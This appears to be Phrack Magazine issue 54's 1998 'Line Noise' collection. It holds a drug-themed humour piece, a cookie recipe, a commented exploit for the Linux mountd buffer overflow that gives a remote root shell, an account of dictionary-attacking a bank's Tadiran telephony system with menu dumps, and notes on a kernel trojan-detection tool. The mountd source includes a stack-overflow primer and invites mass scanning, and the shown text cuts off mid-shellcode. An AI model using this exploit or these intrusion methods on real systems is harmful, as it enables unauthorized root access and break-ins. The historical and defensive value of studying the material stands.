File size: 45,850 Bytes
8ecd256 | 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478 479 480 481 482 483 484 485 486 487 488 489 490 491 492 493 494 495 496 497 498 499 500 501 502 503 504 505 506 507 508 509 510 511 512 513 514 515 516 517 518 519 520 521 522 523 524 525 526 527 528 529 530 531 532 533 534 535 536 537 538 539 540 541 542 543 544 545 546 547 548 549 550 551 552 553 554 555 556 557 558 559 560 561 562 563 564 565 566 567 568 569 570 571 572 573 574 575 576 577 578 579 580 581 582 583 584 585 586 587 588 589 590 591 592 593 594 595 596 597 598 599 600 601 602 603 604 605 606 607 608 609 610 611 612 613 614 615 616 617 618 619 620 621 622 623 624 625 626 627 628 629 630 631 632 633 634 635 636 637 638 639 640 641 642 643 644 645 646 647 648 649 650 651 652 653 654 655 656 657 658 659 660 661 662 663 664 665 666 667 668 669 670 671 672 673 674 675 676 677 678 679 680 681 682 683 684 685 686 687 688 689 690 691 692 693 694 695 696 697 698 699 700 701 702 703 704 705 706 707 708 709 710 711 712 713 714 715 716 717 718 719 720 721 722 723 724 725 726 727 728 729 730 731 732 733 734 735 736 737 738 739 740 741 742 743 744 745 746 747 748 749 750 751 752 753 754 755 756 757 758 759 760 761 762 763 764 765 766 767 768 769 770 771 772 773 774 775 776 777 778 779 780 781 782 783 784 785 786 787 788 789 790 791 792 793 794 795 796 797 798 799 800 801 802 803 804 805 806 807 808 809 810 811 812 813 814 815 816 817 818 819 820 821 822 823 824 825 826 827 828 829 830 831 832 833 834 835 836 837 838 839 840 841 842 843 844 845 846 847 848 849 850 851 852 853 854 855 856 857 858 859 860 861 862 863 864 865 866 867 868 869 870 871 872 873 874 875 876 877 878 879 880 881 882 883 884 885 886 887 888 889 890 891 892 893 894 895 896 897 898 899 900 901 902 903 904 905 906 907 908 909 910 911 912 913 914 915 916 917 918 919 920 921 922 923 924 925 926 927 928 929 930 931 932 933 934 935 936 937 938 939 940 941 942 943 944 945 946 947 948 949 950 951 952 953 954 955 956 957 958 959 960 961 962 963 964 965 966 967 968 969 970 971 972 973 974 975 976 977 978 979 980 981 982 983 984 985 986 987 988 989 990 991 992 993 994 995 996 997 998 999 1000 1001 1002 1003 1004 1005 1006 1007 1008 1009 1010 1011 1012 1013 1014 1015 1016 1017 1018 1019 1020 1021 1022 1023 1024 1025 1026 1027 1028 1029 1030 1031 1032 1033 1034 1035 1036 1037 1038 1039 1040 1041 1042 1043 1044 1045 1046 1047 1048 1049 1050 1051 1052 1053 1054 1055 1056 1057 1058 1059 1060 1061 1062 1063 1064 1065 1066 1067 1068 1069 1070 1071 1072 1073 1074 1075 1076 1077 1078 1079 1080 1081 1082 1083 1084 1085 1086 1087 1088 1089 1090 1091 1092 1093 1094 1095 1096 1097 1098 1099 1100 1101 1102 1103 1104 1105 1106 1107 1108 1109 1110 1111 1112 1113 1114 1115 1116 1117 1118 1119 1120 1121 1122 1123 1124 1125 1126 1127 1128 1129 1130 1131 1132 1133 1134 1135 1136 1137 1138 1139 1140 1141 1142 1143 1144 1145 1146 1147 1148 1149 1150 1151 1152 1153 1154 1155 1156 1157 1158 1159 1160 1161 1162 1163 1164 1165 1166 1167 1168 1169 1170 1171 1172 1173 1174 1175 1176 1177 1178 1179 1180 1181 1182 1183 1184 1185 1186 1187 1188 1189 1190 1191 1192 1193 1194 1195 1196 1197 1198 1199 1200 1201 1202 1203 1204 1205 1206 1207 1208 1209 1210 1211 1212 1213 1214 1215 1216 1217 1218 1219 1220 1221 1222 1223 1224 1225 1226 1227 1228 1229 1230 1231 1232 1233 1234 1235 1236 1237 1238 1239 1240 1241 1242 1243 1244 1245 1246 1247 1248 1249 1250 1251 1252 1253 1254 1255 1256 1257 1258 1259 1260 1261 1262 1263 1264 1265 1266 1267 1268 1269 1270 1271 1272 1273 1274 1275 1276 1277 1278 1279 1280 1281 1282 1283 1284 1285 1286 1287 1288 1289 1290 1291 1292 1293 1294 1295 1296 1297 1298 1299 1300 1301 1302 1303 1304 1305 1306 1307 1308 1309 1310 1311 1312 1313 1314 1315 1316 1317 1318 1319 1320 1321 1322 1323 1324 1325 1326 1327 1328 1329 1330 1331 1332 1333 1334 1335 1336 1337 1338 1339 1340 1341 1342 1343 1344 1345 1346 1347 1348 1349 1350 1351 1352 1353 1354 1355 1356 1357 1358 | ---[ Phrack Magazine Volume 8, Issue 54 Dec 25th, 1998, article 03 of 12
-------------------------[ P H R A C K 5 4 L I N E N O I S E
--------[ Various
0x1>-------------------------------------------------------------------------
The r00t/h4g1s peace summit - 1998
----------------------------------
In a digital world marred by strife and conflict, it was only fitting
that the two mega-super powers of the digital underground met for a peace
conference somewhere they could partake of the peace pipe. Amidst the
quaint silence of the fluttering windmills of Holland, the representatives
of their respective parties settled in for a week of negotiations in the
heart of Amsterdam.
Day 1:
They paint fake flies (the flying kind, not the zipper kind) on the
toilets in the Schlipteinheinekinoffien airport in Amsterdam, because,
as we all know, hackers can't resist a good target. The next stop was
to our official reception at the Hotel Ibis. I walked into the room,
meeting face to face with 7 of the most notorious and feared hackers
alive. My heart raced, and I felt all the sweat glands on my body release
in one giant orgasmic instant. And then I started coughing...
Day 2:
My throat severely scarred from the previous day of going to "coffee"
shops and buying (legally) some marijuana with such names as "The Elite
Buddha", and "Zero Day", we set out for some serious negotiations on the
second day. Our mission was to create a truce, allowing the free
transportation of our packets, unencumbered, unmodified, and unmonitored,
across the Internet. H4g1s demanded r00t supply them with "-1 Day" in
exchange for peace.
r00t requested a "-1 day" from an Internet savvy street person who kept
reminding us of our r00t brother, X. The street person, we'll call him
Outlaw, showed us some pills, but they did not appear to be what
h4g1s was looking for. So, we decided to move on. Outlaw, however, had
other ideas. He wanted his 25 guilders to take his aspirin to X,
apparently (For those of you unfamiliar, a guilder is the Netherlands unit
of money, and roughly resembles monopoly money, except a guilder isn't
really worth anything, whereas monopoly is fun!). We refused, and Chico
got mad. He started telling us, "WE ARE GOING TO HAVE A PROBLEM SOON."
After that, things were "STARTING TO GET VERY SERIOUS." Finally, Chico
got pissed off and broke a beer bottle and started going insane, so r00t &
h4g1s made a temporary truce and started running.
After turning several corners, the mad outlaw was chasing after us with
his broken glass wielding in the cold winter night. We were now in the
"red light district", the physical equivalent to the place on the Internet
where you can buy whores and have sex with them, and people were looking
at us funny being chased through the streets.
Day 4:
We slept through day 4.
Day 3:
Things were getting very strange in Amsterdam. Most notably, day 3
happened AFTER day 4. Don't ask me how. It may have related to the
fungus located within a "Inner Visions" container that we consumed in
the hopes of progressing our talks further. We played some Ultima Online,
except we didn't use any computers. I think there was a strange
steakhouse experience at some point this day, but I can't provide any
further details.
Day 5:
Everything in the world is energy vibrating at different rates. If we
can find some way to make our own matter vibrate at a consistently faster
rate we can transcend the physical universe and enter the digital plane.
I think we need to switch tenses back to the past before. With Outlaw out
of the picture, we resumed our negotiations over some spacecakes (its like
a brownie, or a muffin, or a donut, except it has Zero Day in it).
Day 6:
I thought we ate all the shrooms in Day Pi! Ok, fine. Things are
easier to handle when you have a vision. Vision is just a hallucination
induced by energy waves bouncing around in your head. Your head is cool.
COOL is a lame stock. EBAY is insanely overpriced. So are M3s. Mach 3's
are cool razors. Razors are sharp. Sharp MD players are too thick. As
is Mark's cock. And long!
-r00t & h4g1s
0x2>-------------------------------------------------------------------------
A CASE STUDY: LINUX MOUNTD STACK OVERFLOW
There is nothing new here, but the code is a text book example of how buffer
overflows are done. Even if you have read other articles on buffer overflows
you might find something of value in here. Or maybe not. The case studied
is the Linux nfsd/mountd vulnerability mentioned in the CERT advisory on
Aug 28.
nuuB
<++> linenoise/mountd-sploit.c
/*
* mountd-sploit.c - Sploit for Linux mountd-2.2beta29+ (and earlier). Will
* give a remote root shell.
*
* Cleaned up, documented and submitted to Phrack on Sep 3 1998.
*
* I've included a quick primer on stack overflows and made lots of comments
* in the code, so if you don't know how these stack overflow exploits work
* take this opportunity to learn something.
*
* It is trivial to extend the code (or use scripting) to make something that
* automatically scans subnets or lists of IPs to find vulnerable systems.
* This is left as an exercise for the enterprising young hax0rs out there.
*
* You need the following RPC files for your particular architecture:
*
* nfsmount.h
* nfsmount_xdr.c
*
* These can be generated from 'mount.x' by the 'rpcgen' utility. I simply
* lifted the files that came pre-generated with Linux 'mount'. These are
* included uuencoded, but they may not work on your particular system. Don't
* bug me about this.
*
* Compile with:
*
* cc mountd-sploit.c nfsmount_xdr.c -o mountd-sploit
*
* Have fun, but as always, BEHAVE!
*
* /nuuB
*
*/
/*
A QUICK PRIMER ON STACK OVERFLOWS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Read Aleph1's article in Phrack Issue 49 File 14 (P49-14) for a detailed
explanation on how to write sploits (the examples are for Linux/i386 but
the methodology is valid for any Unix, and can be applied to other OS's
once you understand the technique). If you are targeting one of Bill's OS
check out cDc #351: "The Tao of Windows Buffer Overflow" by DilDog.
The properties that we take advantage of are:
* The stack memory pages have the execute bit set
* The return address from functions are stored on the stack on a higher
address than the local variables.
MEMORY MAP
-- Start of stack (i.e bottom of stack - top of memory) e.g 0xc0000000 --
<environment variables>
<stack frames from main() down to the function calling our function>
<arguments to the vulnerable function>
<** return address **>
<frame pointer for prev frame - unless compiled with -fomit-frame-pointer>
<local variables for the vulnerable function>
-- Top of stack (lower memory address) e.g 0xbffff9c8 --
THE OVERFLOW
The trick is to overflow a local variable that is set through a function
that doesn't check for overflows (strcpy, sprintf, etc). By supplying a
(too) long string you can overwrite memory at higher addresses, i.e closer
to the start of the stack. More specifically we want to overwrite
<** return address **> with a pointer that points back into the stack that
contains code we want executed. Getting the code on the stack is done by
including it in the string we are overflowing with, or by placing it in
an environment variable.
The code can do anything you like, but the standard thing is to execve()
a shell. There are often limitations on what the code can look like in
order to be placed unmangled on the stack (length, touppper(), tolower(),
NULL bytes, path stripping etc). It all depends on how the target program
processes the input we feed it. Be prepared for some tinkering to avoid
certain byte patterns and to make the code use PC/IP relative addressing.
The overflow string (called the 'egg') is normally passed to the
target program through command line arguments, environment variables,
tcp connections or in udp packets.
POSSIBLE COMPLICATIONS
Sometimes you will destroy other local variables with your egg (depends on
how the compiler ordered the variables on the stack). If you use a long
enough egg you could also trash the arguments to the function. As your code
isn't executed until the vulnerable function returns (not at the return of
the function doing the actual overflowing, e.g strcpy()), you must make sure
that the corrupted variables don't cause a crash before the return. This
means that your egg probably has to be aligned perfectly, i.e only use one
return pointer and preceed it with 'correct' values for the local variables
you are trashing. Unfortuntely the ordering of the variables is often
dependent on what compiler options were used. Optimization in particular
can shuffle things around. This means that your exploit will sometimes have
to target a particular set of options.
Most of the time the trashing of other local variables isn't a problem but
you may very well run into it some day.
THE RETURN POINTER
The only problem left is to guess the right address to jump to (i.e the
return pointer). This is done either by trial and error or by examining the
executable (requires you have access to a system identical to the target).
A good way to get a reasonable starting value is to find out how much
environment variables the target process has (hint: use 'ps uxawwwwwwwwe')
and combine that with the base stack pointer (you can find that out with
a one line program that shows the value of the stack pointer).
To increase the chances of success it is customary to fill out the start of
the egg with NOP opcodes, thus as long as the pointer happens to point
somewhere in the egg before the actual code it will execute the NOPs
then the code.
That is all there is to it.
*/
/*
* Now, back to our case study.
*
* Target: rpc.mountd:logging.c
*
* void Dprintf(int kind, const char *fmt, ...) {
* char buff[1024];
* va_list args;
* time_t now;
* struct tm *tm;
*
* if (!(kind & (L_FATAL | L_ERROR | L_WARNING))
* && !(logging && (kind & dbg_mask)))
* return;
* ...
* vsprintf(buff, fmt, args); <-- This is where the overflow is done.
* ...
* if (kind & L_FATAL)
* exit(1);
* } <-- This is where our code (hopefully) gets executed
*
* This function is called from (e.g) mountd.c in svc_req() as follows:
*
* #ifdef WANT_LOG_MOUNTS
* Dprintf(L_WARNING, "Blocked attempt of %s to mount %s\n",
* inet_ntoa(addr), argbuf);
* #endif
*
* Looks great (WANT_LOG_MOUNTS appears to be defined by default). Type
* L_WARNING is always logged, and all we have to do is to try to mount
* something we are not allowed to (i.e as long as we are not included in
* /etc/exports we will be logged and get a chance to overflow).
*
* The only complication is the first %s that we will have to compensate for
* in the egg (our pointers must be aligned correctly).
*
* We use 5 pointers to avoid problems related to how the compiler organized
* the variables on the stack and if the executable was compiled with or
* without -fomit-frame-pointer.
*
* 3 other local variables (size=3*4) + 1 frame-pointer + 1 return pointer = 5
*
* Still plenty of room left for NOPs in the egg. We do have to make sure that
* if the 3 other variables are trashed it won't cause any problems. Examining
* the function we see that 'now' and 'tm' are initialized after the vsprintf()
* and are thus not a problem. However there is a call 'va_end(args)' to end
* the processing of the ellipsis which might be a problem. Luckily this is
* a NOP under Linux. Finally we might have trashed one of the arguments
* 'kind' or 'fmt'. The latter is never used after the vsprintf() but 'kind'
* will cause a exit(1) (bad!) if kind&L_FATAL is true (L_FATAL=0x0008).
* Again, we are in luck. 'kind' is referenced earlier in the function and in
* several other places so the compiler has gratiously placed it in a register
* for us. Thus we can trash the arguments all we want.
*
* Actually, if you examine the executables of mountd in the common distros
* you will find that you don't have to trash any variables at all as 'buffer'
* is placed just before the frame pointer and the return address. We could
* have used a simple egg with just one pointer and this would have worked
* just as well in practise.
*
* All this 'luck' is in fact rather common and is the reason why most buffer
* overflows are easy to write so they work most of the time.
*
* Ok. Delivery of the egg is done through the RPC protocol. I won't go into
* details here. If you are interested, get the sources for the servers and
* clients involved. Half the fun is figuring out how to get the egg in place.
*
* The last piece of the puzzle is to keep shoveling data from the local
* terminal over the TCP connection to the shell and back (remember that
* we used dup2() to connect the shell's stdout/in/err to the TCP connection).
*
* Details below.
*/
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <sys/time.h>
#include <sys/types.h>
#include <fcntl.h>
#include <signal.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <rpc/rpc.h>
#include <rpc/pmap_prot.h>
#include <rpc/pmap_clnt.h>
#include "nfsmount.h"
/*
* First we need to write the code we want executed.
*
* C0de: setreuid(0, 0); fork(); dup2(0, 1); dup2(0, 2); execve("/bin/sh");
*
* setreuid() is probably not necessary, but can't hurt.
*
* fork() is done to change pid. This is needed as someone - probably the
* portmapper - sends signals to mountd (the shell has no handlers for these
* and would die).
*
* The dup2()'s connect stdout/stderr to the TCP socket.
*
* The code assumes 'mountd' communicates with the client using descriptor
* zero. This is the case when it is started as a daemon, but may not be so if
* it is launched from inetd (I couldn't be bothered to test this). The
* dup2()'s may need to be changed accordingly if so.
*
* For Linux/i386 we would get:
*/
#if 0
void c0de() {
__asm__(
"jmp .get_string_addr\n\t" /* Trick to get address of our string */
".d01t:\n\t"
"xorl %eax,%eax\n\t"
"movl %eax,%ebx\n\t" /* ruid=0 */
"movl %eax,%ecx\n\t" /* euid=0 */
"movb $0x46,%eax\n\t" /* __NR_setreuid */
"int $0x8
0x3>-------------------------------------------------------------------------
Eleet ch0c0late ch1p co0kies
by Juliet
The chocolate chip cookies is an old exploit. You can use it to bribe
your teachers, sysadmins, bosses, even feds. Never underestimate the
cookie. Picture this.. little girlie walks up to you in the NOC.. offers
you a home-baked chocolate chip cookie! She must be someone's secretray..
or something.. wow she sure fooled you.. anyway.. bake them.. they are
good.. DO NOT substitue ingrediants.. other than like M&M's for chocolate
chips..
1 cup (packed) golden brown sugar
1/2 cup sugar
1/2 cup solid vegetable shortening, room temperature
1/2 cup (1 stick) unsalted butter, room temperature
2 large eggs
1 tablespoon vanilla extract
3 cups all purpose flour
1 teaspoon baking soda
1 teaspoon salt
1 12-ounce package semisweet chocolate chips
Preheat oven to 350F. Using electric mixer, beat both sugars, shortening
and butter in large bowl until light and fluffy. Beat in eggs and
vanilla. Mix flour, baking soda and salt in large bowl. Add dry
ingredients to butter mixture and mix until blended. Stir in chocolate
chips.
Drop dough by heaping tablespoonfuls onto heavy large baking sheets, spacing
2 inches apart. Bake until golden brown, about 12 minutes. Transfer baking
sheets to racks; cool 5 minutes. Transfer cookies to racks;
cool completely.
Makes about 42 cookies.. or you can make ONE BIG pan cookie
0x4>-------------------------------------------------------------------------
- Tadiran; Computer Telephony Integration (CTI) -
Blakboot <blakboot@darkcartel.com>
Introduction
============
Hello everyone. This article is primarily about Tadiran Telecommunications
software and hardware used to syncronize computer applications with phone
calls. I will be refering to system version 9.63.03.01 and any variants as
just `Tadiran`. From firsthand experiences with this type of system I've
found that they can be configured to do many things, from trunk timers to
on hold music.
Although a very powerful system, the Tadiran lacks basic security. This is
a no no, especially when it provides worldwide technologies for all types
of industries, including banking.
The issue of lack of security is mainly why I wanted to write this article.
The Tadiran is very much open to intrusion.
How it began
============
A phreak friend of mine, Mf-Man, and I were scanning for loops, we found
a carrier. We took a short look at the system for a while, until our
interests waned and took us elsewhere..
Months later, bored, I dialed into the system, with plans of throwing a
dictonary file at it at steady pace (Tadiran, only requires a password for
authentication).
So, I just sat back, and waited... After a long while, to my gleeful
surprise, it cracked! I (like many others before me) did that zealous
happy dance.
This system, Tadiran, is rather cryptic without documentation. Even still,
I managed to dig up some interesting info. This system I managed to get
into was that of a CTI system from a well known bank. The major flaws thus
far (I plan to write a more in depth article):
* Unlimited password attempts.
* No login names.
* A password prompt that responds, well, promptly.
What follows are some screen shots of the Tadiran system.
The system
==========
Password prompt: ENTER PASSWORD
Bad password Msg.: ILL PASSWORD , TRY AGAIN !
System prompt: *:
Enviroment: Tree menus; menus branch from root, and so on.
-This the root menu, the menu sent upon login.-
(ROOT)
CCS 9.63.03.01 SMDI & 24SDT
Copyright (c) 1991-1997 Tadiran Telecommunications Ltd.
NAME - xxxxxxxxx
SAU # - xxxx
0-CONFIG
1-DIAGN
2-TABLES
3-ADMIN
4-ROUTING/COST
5-ISDN
6-DATA
7-CoraLINK
8-NETWORK
9-HELP
Any of the menus/options can be choosen by number, or name.
Control keys:
^C / ESC ------ Go back 1 menu.
^T ------ Displays account and system information.
EXAMPLE:
CCS: xxxxxxxx xxx-xx-1998 10:48pm
Terminal No.: 4, Password level: 0
Software Version: 9.63.03.01 SMDI & 24SDT
^P ------ Relogin.
/* There are others--they seem have something to do with emulation,
and scrolling. *\
Menu descriptions - ment for reference.
=========================================
This is a list of globally accessable menus, available by typing, "HELP"
<Note> I've "x"'d out all group names from the orignal system this
information was recovered from.
PI MESSAGES =(MSG) FEAT. & AUTH. =(FEAT) SMDR CONTROL = (SMDR)
47/8T CARD_DB =(TKDB) FEATURE TIMERS=(FE.T) STATION TIMERS =(ST.T)
ALT ROUT TK.GRP=(ROUT) GROUPS =(GROUP) SYSTEM GEN. =(SYSGEN)
xxxx/xxx GROUP =(xxxx) xxxxxxx GROUP =(xxxx) SYS FEATURES = (SFE)
xxxx GROUP =(xxxx) IST/SLT CARD_DB=(STDB) SYS TIME SET-UP=(TIME)
BUSY PORTS =(BUSY) IST/SLT DEF. =(SLT) TERMINAL SET-UP=(TERM)
CARD DATA-BASE = (CDB) LCR/ROUTING =(LCR) TOLL BARRIER =(TOLL)
CARD LIST =(CLIS) xxxxxxxxx =(xxx) TONE PLAN = (TON)
CLASS OF SERVICE=(COS) xxxxxxxxxxxxx=(xxxxx) TRUNK DEFINITION=(TRK)
COST_CALC. =(COST) NUMBERING PLAN =(NPL) TRUNK_GROUP =(TKGP)
DATA SERVICES =(DATA) PICKUP GROUP =(PICK) TRUNK GRP DEF =(TGDEF)
xxxx CARD DB =(DIDB) PORT DATABASE =(PDB) TRUNK PORTS =(TRUNK)
xxx/xxx GROUP =(DIDG) PORT LIST =(PLIS) TRUNK TIMERS =(TK.T)
DIGITAL TRUNK =(DTDB) PREFERENCE =(PREF) WAKEUP =(WAKEUP)
KEY DEFINITION = (KEY) DIGITAL BUS LIST=(DLIS) ZONED GROUP =(VPZ)
KEY PROGRAMING =(PROG) RINGER P.S. =(RPS) VFAC =(VFAC)
KEYSET TIMERS =(EK.T) SIZES DEF =(SIZ) GROUP CALL =(CALL)
PI MESSAGES - Terminal setup, diag/stim.
47/8T CARD_DB - Card information. Example:
LS_RING_PAUS (sec)- 5
GS_RING_PAUS (sec)- 1
O/G BREAK_TIME(ms)- 60
O/G MAKE_TIME (ms)- 40
O/G INTERDGT_T(ms)- 800
GS_DISCONNECT (ms)- 800
METER (4TMR) :
f0 (0=16K,1=12K,2=50Hz)- 0
f0 ACCURACY +/-(1-10)% - 3
METER_AFTER_DISCONNECT (Y/N) - N
ALT ROUT TK.GRP - Add, display, update, or remove trunk group.
BUSY PORTS - Displays what ports are busy.
CARD DATA-BASE - List many submenus of card, in which you may get/update
CARD LIST - EXAMPLE:
shelf#/slot# p_type i_type card_db# vers/subver status
0 / 1 NO_CARD NO_CARD --- --- --- ------
0 / 2 8DTR/S NO_CARD --- 17 8 ACTIVE
0 / 3 T1 T1 1 14 38 ACTIVE
CLASS OF SERVICE - ST/TK, and ATT show all kinds of information on
trunk control. TENANTS deals with group access.
COST_CALC. - Information about costs for certain services, at various
times.
DIGITAL TRUNK - Card/trunk information, configuration, channel signaling.
KEY DEFINITION - Telephone configuration
EXAMPLE:
prm_cos- 1 sec_cos- 1 priv_libs- 12 terminal- N
origin- N block- N o/g_tk_rest- N privacy- Y
excl_hold- N hard_hold- N last_num- Y security- N
att- Y auto_unatt-N passcode- NONE check_out- N
multi_app- Y m.a.mute_ring-Y mute_ring- Y
auto_ans- N idle_disp.-Y keyclick- Y music- Y
music_num- 0 v_page_in- Y auto_ans_v_p- Y auto_hld/xfer/off-1
spkr_on/off-Y blind_att- N pcc- Y pc_acd- N
mic- Y comb_audio-N display_size- NO_DSP language-DEFAULT
but_num- 2 ksi- N ksi_type- 0
eis- N send_id- Y ali- NONE aoc-e_display-N
alert_makecall-N
active dpem id's- NONE installed dpems- 1
dkt: spkr_environment- 1
music_on_hold - 0
KEYSET TIMERS - EXAMPLE:
1 unit = 0.1 sec.
AUTO_ANSWER - 10
AUTO_ANS_V_PAGE - 10
TONE_TO_IDLE - 10
AOC-E_DISPLAY - 300
MUTE_RING - 50
FEAT. & AUTH - Authorizations, and system features. Check here to
see if Call trace OR caller ID is active.
FEATURE TIMERS - This is a bit interesting.
EXAMPLE:
* (1 unit =1.0 sec)
** (1 unit =0.1 sec)
***(1 unit =0.01 sec)
*AUTO_REDIAL- 30
*REMIND_SNOOZE- 60
*WAKEUP_SNOOZE- 60
**WAKEUP_RING - 300
**NET_FEATURE_ACK- 40
**SUSP_OFFHK- 5
BELL_RING:
**ON_BELL - 10
**OFF_BELL - 20
**ATT.MSG- 50
**EXPENSIVE_ROUTE_TONE - 10
**RING- 100
**SUPV_RECALL- 3600
**CONF_SUPV_RECALL- 1800
**BREAK_IN/OUT- 10
BREAKIN_WARNING:
**ON - 1
**OFF - 20
GROUPS - List of submenus, of groups.
IST/SLT CARD_DB - Ring information.
IST/SLT DEF. - Slot of line info.
EXAMPLE:
prm_cos- 0 sec_cos- 0 priv_libs- 3 terminal- N
origin- N block- N o/g_tk_rest-N privacy- Y
excl_hold-N hard_hold- N last_num- Y security- N
att- N auto_unatt-N passcode- NONE check_out- N
type- 1 announcer- N multi_app- N send_id- Y
ali- NONE opx- N hf_relevant-Y music_on_hold-0
LCR/ROUTING - Libraries, update, or display.
NUMBERING PLAN - Lines, and there features: UPDATE, DISPLAY, ADD,
REMOVE, or SHOW
STATION TIMERS - EXAMPLE:
1 unit = 0.1 sec.
RING- 450
MULT_APR_RING- 200
BUSY- 1200
REORDER- 50
CONFIRM- 30
DVMS- 200
HOLD- 6000
HARD_HOLD- 1200
PARK- 1200
PAGE_Q- 600
1st_DGT - 100
INTERDGT- 150
FEAT_DIAL- 700
HKFLS_FILTER- 10
MAGNETO_AUTO_ANS- 30
CF_NO_ANS- 200
SYSTEM GEN - MENU:
(SYSGEN)
0-INSTALL
1-SIZES_DEF
2-SIZES_TAB
3-SPEED_CALLS (MCC only)
4-MUSIC
5-TIME_SLOTS (4GC only)
0-TRUNK_CALLS_OUTGOING
SYSTEM FEATURES - Trunk_calls_incoming, station_options, intercept/
incomplete, call_forwarding, camp_on, hotel,messaging,
tones, diagnosrics, ISDN, network, and wireless
TONE PLAN - EXAMPLE:
~~~~~~~~
NO NAME TYPE #SEG 1TN Msec 2TN Msec 3TN Msec 4TN Msec 5TN Msec 6TN Msec
0 Busy 3 2 3 500 0 500 0 0 0 0 0 0 0 0
1 Dial 1 0 1 0 0 0 0 0 0 0 0 0 0 0
2 Distinct. 1 0 4 0 0 0 0 0 0 0 0 0 0 0
3 Reorder 3 2 3 240 0 240 0 0 0 0 0 0 0 0
4 Ringback 3 2 2 2000 0 4000 0 0 0 0 0 0 0 0
5 Silence 1 0 0 0 0 0 0 0 0 0 0 0 0 0
6 Tick 3 2 5 60 0 1000 0 0 0 0 0 0 0 0
8 Confirm 3 2 1 100 0 100 0 0 0 0 0 0 0 0
9 BRK_In/Out 1 0 5 0 0 0 0 0 0 0 0 0 0 0
11 V.P Conf 3 2 3 100 5 100 0 0 0 0 0 0 0 0
12 Z.P Warn 3 2 6 300 3 100 0 0 0 0 0 0 0 0
14 LCR_expens 2 6 0 120 5 80 0 120 5 80 0 120 5 80
15 LCR_cheap 2 4 0 120 5 80 0 120 5 80 0 0 0 0
16 Call Wait 3 4 5 600 0 5000 0 5000 0 5000 0 0 0 0
17 DISA Dial 1 0 1 0 0 0 0 0 0 0 0 0 0 0
TRUNK DEFINITION - EXAMPLE:
DISA (0-NO /1-IMMED. /2-DELAY)- 0
COS.- 10
TK_TIMER#- 1
TYPE (0-PULSE /1-DTMF /2-MIX)- 1
I/C_ONLY-N
O/G_ONLY-N
BUSY_OUT-N
AUTO_GUARD-N
HOT_IMMED-N
HOT_DELAY-N
DROP_NO_DIAL-N
RSRVD_TO- NONE
CALLER_ID_TIMEOUT - 50
TRUNK TIMERS - EXAMPLE:
H.FLASH(10ms)- 67
INCOMING :
E&M_SEIZE_TO_WINK- 1
E&M_CONT_WINK_TIME- 2
OUTGOING :
E&M_CONT_WINK/SG_DELAY- 1
SEIZE_TO_DIAL- 15
SECOND_DIAL_TONE- 60
VFAC - Account maintance. - Requires password.
---The ones that I didn't list were either self-explanitory, or N/A
0x5>-------------------------------------------------------------------------
b t r o m b y r i q
------------------------------------------------------------------------------
"trojan eraser or i want my system call table clean"
------------------------------------------------------------------------------
i n t r o d u c t i o n
------------------------------------------------------------------------------
The other day, I started to play with the itf that appeared in P52-18 (read
that article if you want to know what it does, etc). It occured to me one
good way to determine if someone has installed the trojan (and to subsequently
remove it) is by fixing the system call table. This program tries to do that.
This works with the the linux x86 2.0 and 2.2 series.
------------------------------------------------------------------------------
i n t e r n a l s
------------------------------------------------------------------------------
The program first attempts to detect if you are using a BIG_KERNEL (a bzImage)
or not (a zImage). One of the differences is the address of the kernel in
memory. BIG_KERNEL starts at 0xc0000000 while the other starts at 0x00100000.
The system call table (sct) has the entries of all the system calls. If
you modify the sct, the new entry must be `out of range'. btrom will try to
fix these `out of range' system calls with their original values. They are
taken from the System.map. What i mean with "`out of range'" is an entry
that has a value out of the start_of_the_kernel and the_start_of_the_kernel +
some_value. This value is in the config.h
------------------------------------------------------------------------------
q u i c k i n s t a l l
------------------------------------------------------------------------------
compile:
--------
1) edit config.h and Makefile. Modify it if you want.
$ vi config.h
$ vi Makefile
2) make
$ make
use:
----
1) be root
$ su -
2) install the module mbtrom
# insmod mbtrom
3) run btrom
# ./btrom _nr_mbtrom_ [options]
4) uninstall the module mbtrom
# rmmod mbtrom
------------------------------------------------------------------------------
c h a c h a r a
------------------------------------------------------------------------------
1st part: detect trojans legends
[ ] this is ok. dont worry
[N] this is a null enter in the system call table. dont worry.
[-] this is the entry of the module mbtrom. dont worry.
[?] this entry has a system function, but it was supposed to be null. worry
[*] this is probably a trojan in a reserved space. worry.
[!] this is probably a trojan in a not reserved space. worry.
2nd part: clean trojans legends
<s> press 's' to fill this entry with the System.map's value.
<c> press 'c' to clean this entry. it will be filled with a null entry.
<m> press 'm' to put in this entry a manual hexa address.
<i> press 'i' to ignore, skip, what you want.
------------------------------------------------------------------------------
n o t e s
------------------------------------------------------------------------------
